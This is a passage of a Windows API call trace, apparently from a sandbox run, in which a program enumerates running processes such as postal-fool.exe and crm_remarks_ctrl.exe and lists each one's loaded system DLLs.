	[0106.528] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\KERNEL32.DLL", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\KERNEL32.DLL", lpUsedDefaultChar=0x0) returned 33
	[0106.529] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="KERNEL32.DLL", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="KERNEL32.DLL", lpUsedDefaultChar=0x0) returned 13
	[0106.529] Module32NextW (hSnapshot=0x870, lpme=0x20af280) returned 1
	[0106.529] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\KERNELBASE.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\KERNELBASE.dll", lpUsedDefaultChar=0x0) returned 35
	[0106.529] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="KERNELBASE.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="KERNELBASE.dll", lpUsedDefaultChar=0x0) returned 15
	[0106.529] Module32NextW (hSnapshot=0x870, lpme=0x20af280) returned 1
	[0106.530] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\system32\\apphelp.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\system32\\apphelp.dll", lpUsedDefaultChar=0x0) returned 32
	[0106.530] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="apphelp.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="apphelp.dll", lpUsedDefaultChar=0x0) returned 12
	[0106.530] Module32NextW (hSnapshot=0x870, lpme=0x20af280) returned 1
	[0106.531] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\USER32.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\USER32.dll", lpUsedDefaultChar=0x0) returned 31
	[0106.531] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="USER32.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="USER32.dll", lpUsedDefaultChar=0x0) returned 11
	[0106.531] Module32NextW (hSnapshot=0x870, lpme=0x20af280) returned 1
	[0106.532] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\GDI32.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\GDI32.dll", lpUsedDefaultChar=0x0) returned 30
	[0106.532] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="GDI32.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GDI32.dll", lpUsedDefaultChar=0x0) returned 10
	[0106.532] Module32NextW (hSnapshot=0x870, lpme=0x20af280) returned 1
	[0106.533] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\IMM32.DLL", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\IMM32.DLL", lpUsedDefaultChar=0x0) returned 30
	[0106.533] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="IMM32.DLL", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="IMM32.DLL", lpUsedDefaultChar=0x0) returned 10
	[0106.533] Module32NextW (hSnapshot=0x870, lpme=0x20af280) returned 1
	[0106.533] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\system32\\uxtheme.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\system32\\uxtheme.dll", lpUsedDefaultChar=0x0) returned 32
	[0106.534] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="uxtheme.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uxtheme.dll", lpUsedDefaultChar=0x0) returned 12
	[0106.534] Module32NextW (hSnapshot=0x870, lpme=0x20af280) returned 1
	[0106.534] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\msvcrt.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\msvcrt.dll", lpUsedDefaultChar=0x0) returned 31
	[0106.534] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msvcrt.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="msvcrt.dll", lpUsedDefaultChar=0x0) returned 11
	[0106.534] Module32NextW (hSnapshot=0x870, lpme=0x20af280) returned 1
	[0106.535] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\combase.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\combase.dll", lpUsedDefaultChar=0x0) returned 32
	[0106.535] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="combase.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="combase.dll", lpUsedDefaultChar=0x0) returned 12
	[0106.535] Module32NextW (hSnapshot=0x870, lpme=0x20af280) returned 1
	[0106.536] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\RPCRT4.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\RPCRT4.dll", lpUsedDefaultChar=0x0) returned 31
	[0106.536] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="RPCRT4.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RPCRT4.dll", lpUsedDefaultChar=0x0) returned 11
	[0106.536] Module32NextW (hSnapshot=0x870, lpme=0x20af280) returned 1
	[0106.537] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\SspiCli.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\SspiCli.dll", lpUsedDefaultChar=0x0) returned 32
	[0106.537] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SspiCli.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SspiCli.dll", lpUsedDefaultChar=0x0) returned 12
	[0106.537] Module32NextW (hSnapshot=0x870, lpme=0x20af280) returned 1
	[0106.537] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\CRYPTBASE.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\CRYPTBASE.dll", lpUsedDefaultChar=0x0) returned 34
	[0106.537] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CRYPTBASE.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CRYPTBASE.dll", lpUsedDefaultChar=0x0) returned 14
	[0106.537] Module32NextW (hSnapshot=0x870, lpme=0x20af280) returned 1
	[0106.538] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\bcryptPrimitives.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\bcryptPrimitives.dll", lpUsedDefaultChar=0x0) returned 41
	[0106.538] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="bcryptPrimitives.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bcryptPrimitives.dll", lpUsedDefaultChar=0x0) returned 21
	[0106.538] Module32NextW (hSnapshot=0x870, lpme=0x20af280) returned 1
	[0106.539] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\sechost.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\sechost.dll", lpUsedDefaultChar=0x0) returned 32
	[0106.539] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="sechost.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sechost.dll", lpUsedDefaultChar=0x0) returned 12
	[0106.539] Module32NextW (hSnapshot=0x870, lpme=0x20af280) returned 1
	[0106.540] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\MSCTF.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\MSCTF.dll", lpUsedDefaultChar=0x0) returned 30
	[0106.540] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSCTF.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MSCTF.dll", lpUsedDefaultChar=0x0) returned 10
	[0106.540] Module32NextW (hSnapshot=0x870, lpme=0x20af280) returned 1
	[0106.541] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\system32\\dwmapi.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\system32\\dwmapi.dll", lpUsedDefaultChar=0x0) returned 31
	[0106.541] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="dwmapi.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dwmapi.dll", lpUsedDefaultChar=0x0) returned 11
	[0106.541] Module32NextW (hSnapshot=0x870, lpme=0x20af280) returned 0
	[0106.542] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="bryant.exe", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bryant.exe", lpUsedDefaultChar=0x0) returned 11
	[0106.542] Process32NextW (in: hSnapshot=0x7e4, lppe=0x20af710 | out: lppe=0x20af710*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xfc0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x84c, pcPriClassBase=8, dwFlags=0x0, szExeFile="postal-fool.exe")) returned 1
	[0106.543] CreateToolhelp32Snapshot (dwFlags=0x8, th32ProcessID=0xfc0) returned 0x874
	[0106.550] Module32FirstW (hSnapshot=0x874, lpme=0x20af280) returned 1
	[0106.551] Module32NextW (hSnapshot=0x874, lpme=0x20af280) returned 1
	[0106.552] Module32NextW (hSnapshot=0x874, lpme=0x20af280) returned 1
	[0106.553] Module32NextW (hSnapshot=0x874, lpme=0x20af280) returned 1
	[0106.554] Module32NextW (hSnapshot=0x874, lpme=0x20af280) returned 1
	[0106.554] Module32NextW (hSnapshot=0x874, lpme=0x20af280) returned 1
	[0106.569] Module32NextW (hSnapshot=0x874, lpme=0x20af280) returned 1
	[0106.570] Module32NextW (hSnapshot=0x874, lpme=0x20af280) returned 1
	[0106.571] Module32NextW (hSnapshot=0x874, lpme=0x20af280) returned 1
	[0106.572] Module32NextW (hSnapshot=0x874, lpme=0x20af280) returned 1
	[0106.573] Module32NextW (hSnapshot=0x874, lpme=0x20af280) returned 1
	[0106.573] Module32NextW (hSnapshot=0x874, lpme=0x20af280) returned 1
	[0106.574] Module32NextW (hSnapshot=0x874, lpme=0x20af280) returned 1
	[0106.575] Module32NextW (hSnapshot=0x874, lpme=0x20af280) returned 1
	[0106.576] Module32NextW (hSnapshot=0x874, lpme=0x20af280) returned 1
	[0106.576] Module32NextW (hSnapshot=0x874, lpme=0x20af280) returned 1
	[0106.577] Module32NextW (hSnapshot=0x874, lpme=0x20af280) returned 1
	[0106.578] Module32NextW (hSnapshot=0x874, lpme=0x20af280) returned 1
	[0106.579] Module32NextW (hSnapshot=0x874, lpme=0x20af280) returned 0
	[0106.579] Module32FirstW (hSnapshot=0x874, lpme=0x20af280) returned 1
	[0106.580] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Uninstall Information\\postal-fool.exe", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Uninstall Information\\postal-fool.exe", lpUsedDefaultChar=0x0) returned 55
	[0106.580] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="postal-fool.exe", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="postal-fool.exe", lpUsedDefaultChar=0x0) returned 16
	[0106.580] Module32NextW (hSnapshot=0x874, lpme=0x20af280) returned 1
	[0106.586] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\ntdll.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\ntdll.dll", lpUsedDefaultChar=0x0) returned 30
	[0106.586] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ntdll.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ntdll.dll", lpUsedDefaultChar=0x0) returned 10
	[0106.586] Module32NextW (hSnapshot=0x874, lpme=0x20af280) returned 1
	[0106.587] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\KERNEL32.DLL", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\KERNEL32.DLL", lpUsedDefaultChar=0x0) returned 33
	[0106.587] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="KERNEL32.DLL", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="KERNEL32.DLL", lpUsedDefaultChar=0x0) returned 13
	[0106.587] Module32NextW (hSnapshot=0x874, lpme=0x20af280) returned 1
	[0106.588] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\KERNELBASE.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\KERNELBASE.dll", lpUsedDefaultChar=0x0) returned 35
	[0106.588] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="KERNELBASE.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="KERNELBASE.dll", lpUsedDefaultChar=0x0) returned 15
	[0106.588] Module32NextW (hSnapshot=0x874, lpme=0x20af280) returned 1
	[0106.589] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\system32\\apphelp.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\system32\\apphelp.dll", lpUsedDefaultChar=0x0) returned 32
	[0106.589] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="apphelp.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="apphelp.dll", lpUsedDefaultChar=0x0) returned 12
	[0106.589] Module32NextW (hSnapshot=0x874, lpme=0x20af280) returned 1
	[0106.590] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\USER32.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\USER32.dll", lpUsedDefaultChar=0x0) returned 31
	[0106.590] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="USER32.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="USER32.dll", lpUsedDefaultChar=0x0) returned 11
	[0106.590] Module32NextW (hSnapshot=0x874, lpme=0x20af280) returned 1
	[0106.590] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\GDI32.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\GDI32.dll", lpUsedDefaultChar=0x0) returned 30
	[0106.590] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="GDI32.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GDI32.dll", lpUsedDefaultChar=0x0) returned 10
	[0106.590] Module32NextW (hSnapshot=0x874, lpme=0x20af280) returned 1
	[0106.591] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\IMM32.DLL", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\IMM32.DLL", lpUsedDefaultChar=0x0) returned 30
	[0106.591] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="IMM32.DLL", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="IMM32.DLL", lpUsedDefaultChar=0x0) returned 10
	[0106.591] Module32NextW (hSnapshot=0x874, lpme=0x20af280) returned 1
	[0106.592] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\system32\\uxtheme.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\system32\\uxtheme.dll", lpUsedDefaultChar=0x0) returned 32
	[0106.592] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="uxtheme.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uxtheme.dll", lpUsedDefaultChar=0x0) returned 12
	[0106.592] Module32NextW (hSnapshot=0x874, lpme=0x20af280) returned 1
	[0106.593] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\msvcrt.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\msvcrt.dll", lpUsedDefaultChar=0x0) returned 31
	[0106.593] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msvcrt.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="msvcrt.dll", lpUsedDefaultChar=0x0) returned 11
	[0106.593] Module32NextW (hSnapshot=0x874, lpme=0x20af280) returned 1
	[0106.594] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\combase.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\combase.dll", lpUsedDefaultChar=0x0) returned 32
	[0106.594] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="combase.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="combase.dll", lpUsedDefaultChar=0x0) returned 12
	[0106.594] Module32NextW (hSnapshot=0x874, lpme=0x20af280) returned 1
	[0106.595] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\RPCRT4.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\RPCRT4.dll", lpUsedDefaultChar=0x0) returned 31
	[0106.595] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="RPCRT4.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RPCRT4.dll", lpUsedDefaultChar=0x0) returned 11
	[0106.595] Module32NextW (hSnapshot=0x874, lpme=0x20af280) returned 1
	[0106.596] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\SspiCli.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\SspiCli.dll", lpUsedDefaultChar=0x0) returned 32
	[0106.596] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SspiCli.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SspiCli.dll", lpUsedDefaultChar=0x0) returned 12
	[0106.596] Module32NextW (hSnapshot=0x874, lpme=0x20af280) returned 1
	[0106.597] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\CRYPTBASE.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\CRYPTBASE.dll", lpUsedDefaultChar=0x0) returned 34
	[0106.597] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CRYPTBASE.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CRYPTBASE.dll", lpUsedDefaultChar=0x0) returned 14
	[0106.597] Module32NextW (hSnapshot=0x874, lpme=0x20af280) returned 1
	[0106.598] Module32NextW (hSnapshot=0x874, lpme=0x20af280) returned 1
	[0106.599] Module32NextW (hSnapshot=0x874, lpme=0x20af280) returned 1
	[0106.600] Module32NextW (hSnapshot=0x874, lpme=0x20af280) returned 1
	[0106.601] Module32NextW (hSnapshot=0x874, lpme=0x20af280) returned 0
	[0106.602] Process32NextW (in: hSnapshot=0x7e4, lppe=0x20af710 | out: lppe=0x20af710*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xfe4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x84c, pcPriClassBase=8, dwFlags=0x0, szExeFile="crm_remarks_ctrl.exe")) returned 1
	[0106.603] CreateToolhelp32Snapshot (dwFlags=0x8, th32ProcessID=0xfe4) returned 0x878
	[0106.641] Module32FirstW (hSnapshot=0x878, lpme=0x20af280) returned 1
	[0106.642] Module32NextW (hSnapshot=0x878, lpme=0x20af280) returned 1
	[0106.643] Module32NextW (hSnapshot=0x878, lpme=0x20af280) returned 1
	[0106.644] Module32NextW (hSnapshot=0x878, lpme=0x20af280) returned 1
	[0106.644] Module32NextW (hSnapshot=0x878, lpme=0x20af280) returned 1
	[0106.645] Module32NextW (hSnapshot=0x878, lpme=0x20af280) returned 1
	[0106.646] Module32NextW (hSnapshot=0x878, lpme=0x20af280) returned 1
	[0106.647] Module32NextW (hSnapshot=0x878, lpme=0x20af280) returned 1
	[0106.648] Module32NextW (hSnapshot=0x878, lpme=0x20af280) returned 1
	[0106.648] Module32NextW (hSnapshot=0x878, lpme=0x20af280) returned 1
	[0106.649] Module32NextW (hSnapshot=0x878, lpme=0x20af280) returned 1
	[0106.650] Module32NextW (hSnapshot=0x878, lpme=0x20af280) returned 1
	[0106.651] Module32NextW (hSnapshot=0x878, lpme=0x20af280) returned 1
	[0106.651] Module32NextW (hSnapshot=0x878, lpme=0x20af280) returned 1
	[0106.652] Module32NextW (hSnapshot=0x878, lpme=0x20af280) returned 1
	[0106.653] Module32NextW (hSnapshot=0x878, lpme=0x20af280) returned 1
	[0106.654] Module32NextW (hSnapshot=0x878, lpme=0x20af280) returned 1
	[0106.654] Module32NextW (hSnapshot=0x878, lpme=0x20af280) returned 1
	[0106.655] Module32NextW (hSnapshot=0x878, lpme=0x20af280) returned 0
	[0106.656] Module32FirstW (hSnapshot=0x878, lpme=0x20af280) returned 1
	[0106.657] Module32NextW (hSnapshot=0x878, lpme=0x20af280) returned 1
	[0106.658] Module32NextW (hSnapshot=0x878, lpme=0x20af280) returned 1
	[0106.659] Module32NextW (hSnapshot=0x878, lpme=0x20af280) returned 1
